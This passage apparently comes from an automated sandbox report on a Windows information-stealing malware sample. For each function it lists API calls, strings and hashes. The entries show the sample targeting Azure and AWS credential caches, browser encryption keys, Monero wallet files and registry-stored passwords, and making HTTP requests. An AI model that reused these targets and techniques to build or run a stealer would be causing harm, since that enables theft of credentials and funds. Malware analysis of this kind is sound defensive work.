                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                  • API String ID: 949356159-974132213
                  • Opcode ID: cf373ba4606ec2f31ece4068a743adb11ac3b5327e884ae35d3ec754caf43ae4
                  • Instruction ID: 2ff1fcbf9fc548b3af6c3b4fb9c824916f6cb2cb7a11e8a2d2315c3ab4b6378b
                  • Opcode Fuzzy Hash: cf373ba4606ec2f31ece4068a743adb11ac3b5327e884ae35d3ec754caf43ae4
                  • Instruction Fuzzy Hash: B14181BA9802186BDB50F760EC47FED3238EB64705F004494B989660C1EEB45BCD8BB3
                  Function 00D49010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                  Download Yara Rule
                  APIs
                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00D4906C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateGlobalStream
                  • String ID: image/jpeg
                  • API String ID: 2244384528-3785015651
                  • Opcode ID: 66aa825dcaeeef74d3dd7408409f40339c72198b63bc5629636ff4380fae1a8c
                  • Instruction ID: 467379f12379f439309b1d0b38984706b9e439c126810e1446879a4cf97d29ae
                  • Opcode Fuzzy Hash: 66aa825dcaeeef74d3dd7408409f40339c72198b63bc5629636ff4380fae1a8c
                  • Instruction Fuzzy Hash: 8371DB75910208ABDB04EFE4DC99FEEB7B8EB88700F148508F519A7290DB74A945DB72
                  Function 00D42E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00D431C5
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00D4335D
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00D434EA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExecuteShell$lstrcpy
                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                  • API String ID: 2507796910-3625054190
                  • Opcode ID: 4d7cdd88a1996e290bef2fd469bc420f04a680bfe1234de91362a1dc86e2ed5f
                  • Instruction ID: f21428f49cd7ef8bf7c952c14d72570fda4a7d71f9ac2778a600bf3aa4f9a5ed
                  • Opcode Fuzzy Hash: 4d7cdd88a1996e290bef2fd469bc420f04a680bfe1234de91362a1dc86e2ed5f
                  • Instruction Fuzzy Hash: D812E971850118ABEB19EBA4DC92FEEB738EF14300F504159F50666192EF746B4ACFB2
                  Function 00D452C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                    • Part of subcall function 00D36280: InternetOpenA.WININET(00D50DFE,00000001,00000000,00000000,00000000), ref: 00D362E1
                    • Part of subcall function 00D36280: StrCmpCA.SHLWAPI(?,00AFE9F8), ref: 00D36303
                    • Part of subcall function 00D36280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D36335
                    • Part of subcall function 00D36280: HttpOpenRequestA.WININET(00000000,GET,?,00AFE218,00000000,00000000,00400100,00000000), ref: 00D36385
                    • Part of subcall function 00D36280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00D363BF
                    • Part of subcall function 00D36280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00D363D1
                    • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00D45318
                  • lstrlen.KERNEL32(00000000), ref: 00D4532F
                    • Part of subcall function 00D48E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00D48E52
                  • StrStrA.SHLWAPI(00000000,00000000), ref: 00D45364
                  • lstrlen.KERNEL32(00000000), ref: 00D45383
                  • lstrlen.KERNEL32(00000000), ref: 00D453AE
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                  • API String ID: 3240024479-1526165396
                  • Opcode ID: f9d394346da9a61b27e6dc90b18fcd0c7c2f75ca9a6e242df39dba7c075629ba
                  • Instruction ID: db742756c067be906b402c84c2cb48c1267ddaf385a297090853795064b9ea47
                  • Opcode Fuzzy Hash: f9d394346da9a61b27e6dc90b18fcd0c7c2f75ca9a6e242df39dba7c075629ba
                  • Instruction Fuzzy Hash: FD513F309501489BEB18FF68DD92AED7779EF50305F504018F80A6B192DF34AB4ACB72
                  Function 00D412D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpylstrlen
                  • String ID:
                  • API String ID: 2001356338-0
                  • Opcode ID: 97b92f4273af14ead1476e847cd141901aa44bd70087cf9ef87866bbfd9cc62d
                  • Instruction ID: 1c5a8e199403a114301fd0741e5bbf6f3171dd33c8ddf75abd813af74fe1704e
                  • Opcode Fuzzy Hash: 97b92f4273af14ead1476e847cd141901aa44bd70087cf9ef87866bbfd9cc62d
                  • Instruction Fuzzy Hash: 39C170B594021D9BCB14EF60DC89FEE7378FB64304F004598E50AA7241EA74EA85DFB2
                  Function 00D44280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00D48DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00D48E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00D442EC
                  • lstrcat.KERNEL32(?,00AFE320), ref: 00D4430B
                  • lstrcat.KERNEL32(?,?), ref: 00D4431F
                  • lstrcat.KERNEL32(?,00AFD260), ref: 00D44333
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                    • Part of subcall function 00D48D90: GetFileAttributesA.KERNEL32(00000000,?,00D31B54,?,?,00D5564C,?,?,00D50E1F), ref: 00D48D9F
                    • Part of subcall function 00D39CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00D39D39
                    • Part of subcall function 00D399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D399EC
                    • Part of subcall function 00D399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00D39A11
                    • Part of subcall function 00D399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00D39A31
                    • Part of subcall function 00D399C0: ReadFile.KERNEL32(000000FF,?,00000000,00D3148F,00000000), ref: 00D39A5A
                    • Part of subcall function 00D399C0: LocalFree.KERNEL32(00D3148F), ref: 00D39A90
                    • Part of subcall function 00D399C0: CloseHandle.KERNEL32(000000FF), ref: 00D39A9A
                    • Part of subcall function 00D493C0: GlobalAlloc.KERNEL32(00000000,00D443DD,00D443DD), ref: 00D493D3
                  • StrStrA.SHLWAPI(?,00AFE3B0), ref: 00D443F3
                  • GlobalFree.KERNEL32(?), ref: 00D44512
                    • Part of subcall function 00D39AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D34EEE,00000000,00000000), ref: 00D39AEF
                    • Part of subcall function 00D39AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00D34EEE,00000000,?), ref: 00D39B01
                    • Part of subcall function 00D39AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D34EEE,00000000,00000000), ref: 00D39B2A
                    • Part of subcall function 00D39AC0: LocalFree.KERNEL32(?,?,?,?,00D34EEE,00000000,?), ref: 00D39B3F
                  • lstrcat.KERNEL32(?,00000000), ref: 00D444A3
                  • StrCmpCA.SHLWAPI(?,00D508D1), ref: 00D444C0
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00D444D2
                  • lstrcat.KERNEL32(00000000,?), ref: 00D444E5
                  • lstrcat.KERNEL32(00000000,00D50FB8), ref: 00D444F4
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                  • String ID:
                  • API String ID: 3541710228-0
                  • Opcode ID: 34205433318de4909283ce669156eec3527ad351be2faba8f0801898e2cef981
                  • Instruction ID: 7b9b23505f912a128e2be82a59fee6a7b2f406cd1914de87d92562374c07d89e
                  • Opcode Fuzzy Hash: 34205433318de4909283ce669156eec3527ad351be2faba8f0801898e2cef981
                  • Instruction Fuzzy Hash: B57146B6900208ABDB14FBA4DC95FEE7779EB88300F044598F60997181DA74DB49DFB2
                  Function 00D31310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00D312A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D312B4
                    • Part of subcall function 00D312A0: RtlAllocateHeap.NTDLL(00000000), ref: 00D312BB
                    • Part of subcall function 00D312A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00D312D7
                    • Part of subcall function 00D312A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00D312F5
                    • Part of subcall function 00D312A0: RegCloseKey.ADVAPI32(?), ref: 00D312FF
                  • lstrcat.KERNEL32(?,00000000), ref: 00D3134F
                  • lstrlen.KERNEL32(?), ref: 00D3135C
                  • lstrcat.KERNEL32(?,.keys), ref: 00D31377
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                    • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                    • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                    • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                    • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                    • Part of subcall function 00D48B60: GetSystemTime.KERNEL32(00D50E1A,00AFA690,00D505AE,?,?,00D313F9,?,0000001A,00D50E1A,00000000,?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D48B86
                    • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                    • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00D31465
                    • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                    • Part of subcall function 00D399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D399EC
                    • Part of subcall function 00D399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00D39A11
                    • Part of subcall function 00D399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00D39A31
                    • Part of subcall function 00D399C0: ReadFile.KERNEL32(000000FF,?,00000000,00D3148F,00000000), ref: 00D39A5A
                    • Part of subcall function 00D399C0: LocalFree.KERNEL32(00D3148F), ref: 00D39A90
                    • Part of subcall function 00D399C0: CloseHandle.KERNEL32(000000FF), ref: 00D39A9A
                  • DeleteFileA.KERNEL32(00000000), ref: 00D314EF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                  • API String ID: 3478931302-218353709
                  • Opcode ID: 069bbd38c5c30f020fff4711cfd92b3dc9762c7edd829272e00dcb76176c87eb
                  • Instruction ID: 934bf4653c6c9ac7fbd65f98ecac3d92280a9c02ac1d47b2a3f9449a044fd196
                  • Opcode Fuzzy Hash: 069bbd38c5c30f020fff4711cfd92b3dc9762c7edd829272e00dcb76176c87eb
                  • Instruction Fuzzy Hash: 065121B19901195BDB15FB64DD92BED733CEF54304F404598B60AA2082EE706B8ACFB6
                  Function 00D375D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00D372D0: memset.MSVCRT ref: 00D37314
                    • Part of subcall function 00D372D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00D3733A
                    • Part of subcall function 00D372D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00D373B1
                    • Part of subcall function 00D372D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00D3740D
                    • Part of subcall function 00D372D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00D37452
                    • Part of subcall function 00D372D0: HeapFree.KERNEL32(00000000), ref: 00D37459
                  • lstrcat.KERNEL32(00000000,00D517FC), ref: 00D37606
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00D37648
                  • lstrcat.KERNEL32(00000000, : ), ref: 00D3765A
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00D3768F
                  • lstrcat.KERNEL32(00000000,00D51804), ref: 00D376A0
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00D376D3
                  • lstrcat.KERNEL32(00000000,00D51808), ref: 00D376ED
                  • task.LIBCPMTD ref: 00D376FB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                  • String ID: :
                  • API String ID: 3191641157-3653984579
                  • Opcode ID: 7d343485202a4926a730b86ca5bf95cb56793ab4b397000ad290931cc87b2611
                  • Instruction ID: d065a23e2726e6dbd8d1f511213f5da41ddef5b2133168077adee27f917abe36
                  • Opcode Fuzzy Hash: 7d343485202a4926a730b86ca5bf95cb56793ab4b397000ad290931cc87b2611
                  • Instruction Fuzzy Hash: 9E314DB2900209DFCB54EBE4DC96DEE7775EB88302F144118F516A7290DA34A986EB72
                  Function 00D372D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 00D37314
                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00D3733A
                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00D373B1
                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00D3740D
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00D37452
                  • HeapFree.KERNEL32(00000000), ref: 00D37459
                  • task.LIBCPMTD ref: 00D37555
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$EnumFreeOpenProcessValuememsettask
                  • String ID: Password
                  • API String ID: 2808661185-3434357891
                  • Opcode ID: b779cb7da26da02fb9a65d578dba23d0867b7e965867f879a82fc497cc768131
                  • Instruction ID: 514d193a8e801a48b5a9c13d87f173a6f629f3a229c0a60f3dd8b821bb5ba0a5
                  • Opcode Fuzzy Hash: b779cb7da26da02fb9a65d578dba23d0867b7e965867f879a82fc497cc768131
                  • Instruction Fuzzy Hash: DA612BB590426C9BDB24DB50CC51BDAB7B8FF48300F0481E9E689A6141DBB06BC9CFB1
                  Function 00D48100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00AFE050,00000000,?,00D50E2C,00000000,?,00000000), ref: 00D48130
